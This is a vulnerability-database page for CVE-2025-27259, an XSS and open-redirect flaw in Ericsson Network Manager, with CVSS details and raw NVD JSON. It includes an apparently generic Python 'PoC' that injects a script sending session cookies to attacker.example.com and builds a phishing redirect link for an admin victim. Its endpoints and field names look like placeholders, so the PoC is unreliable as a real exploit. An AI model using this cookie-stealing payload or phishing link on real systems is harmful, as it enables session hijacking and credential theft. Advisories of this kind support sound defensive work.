Security Vulnerability Report
中文
CVE-2025-27259 CVSS 5.4 MEDIUM

CVE-2025-27259

Published: 2025-10-13 07:15:55
Last Modified: 2025-10-21 17:17:14
Source: 85b1779b-6ecd-4f52-bcc5-73eac4659dcf

Description

Ericsson Network Manager versions prior to ENM 25.2 GA contain a vulnerability that, if exploited, can exfiltrate limited data or redirect victims to other sites or domains.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ericsson:network_manager:*:*:*:*:*:*:*:* - VULNERABLE
Ericsson Network Manager < ENM 25.2 GA

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-27259 - Ericsson Network Manager XSS/Open Redirect PoC # This PoC demonstrates the concept of exploiting an XSS vulnerability # in Ericsson Network Manager prior to ENM 25.2 GA import requests import sys TARGET_URL = "https://target-enm-server.example.com" ATTACKER_SERVER = "https://attacker.example.com/steal" # Step 1: Authenticate with low-privilege credentials session = requests.Session() login_payload = { "username": "low_priv_user", "password": "password123" } session.post(f"{TARGET_URL}/api/auth/login", data=login_payload) # Step 2: Inject malicious XSS payload into a vulnerable input field # This payload will exfiltrate session cookies to the attacker's server xss_payload = ( "<script>" f"fetch('{ATTACKER_SERVER}?cookie=' + document.cookie)" "</script>" ) # Inject the payload into a field that will be viewed by other users (e.g., admin) inject_payload = { "field_name": "description", # Replace with actual vulnerable parameter "field_value": xss_payload } session.post(f"{TARGET_URL}/api/config/update", data=inject_payload) # Step 3: Alternatively, demonstrate open redirect vulnerability redirect_payload = f"{TARGET_URL}/redirect?url=https://attacker.example.com/phishing" print(f"Malicious redirect URL: {redirect_payload}") # Step 4: Craft a phishing link to send to the victim (admin user) phishing_link = f"{TARGET_URL}/page?view={redirect_payload}" print(f"Phishing link to send to victim: {phishing_link}") print("[+] Payload injected successfully") print("[+] Waiting for victim (admin) to view the malicious content...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27259", "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "published": "2025-10-13T07:15:54.993", "lastModified": "2025-10-21T17:17:14.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ericsson Network Manager versions prior to ENM 25.2 GA contain a vulnerability that, if exploited, can exfiltrate limited data or redirect victims to other sites or domains."}], "metrics": {"cvssMetricV40": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ericsson:network_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2", "matchCriteriaId": "AE815B4D-BF88-44C6-9AD4-63C606F71A4E"}]}]}], "references": [{"url": "https://www.ericsson.com/en/about-us/security/psirt/security-bulletin-enm-october-2025", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}]}}